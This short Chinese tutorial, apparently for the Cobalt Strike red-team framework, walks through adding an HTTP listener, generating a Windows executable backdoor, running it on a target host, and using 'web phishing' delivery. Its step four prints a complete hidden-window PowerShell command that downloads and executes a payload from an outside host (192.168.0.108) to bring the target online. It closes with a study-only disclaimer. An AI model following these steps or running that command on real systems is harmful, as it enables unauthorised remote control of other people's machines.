一、添加监听器

1、点击菜单栏下面那个耳机的图标，出现监听器选项卡，然后点击添加

2、修改关键参数，填写服务端的ip地址192.168.0.108，HTTP上线端口可以是任意端口，这里改为8888，然后点击保存

3、自动将监听器添加到下面的选项卡里

二、生成后门

1、点击攻击，选择生成后门，再选择Windows可执行程序（E）

2、点击选择按钮，添加上一步生成的名为ayou的监听器，点击选择，然后回到对话框，再点击生成。

三、获取目标主机

将生成的exe文件，在目标主机上运行，获取目标主机信息

四、web钓鱼

1、点击攻击，选择web钓鱼（W），选择web投递（Stageless）

2、选择上一步生成的名为aiyou的监听器，然后点击运行

3、会程程一条命令，让目标主机通过powershell执行该命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.108:80/a'))"

4、主机成功上线

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者不承担任何法律及连带责任。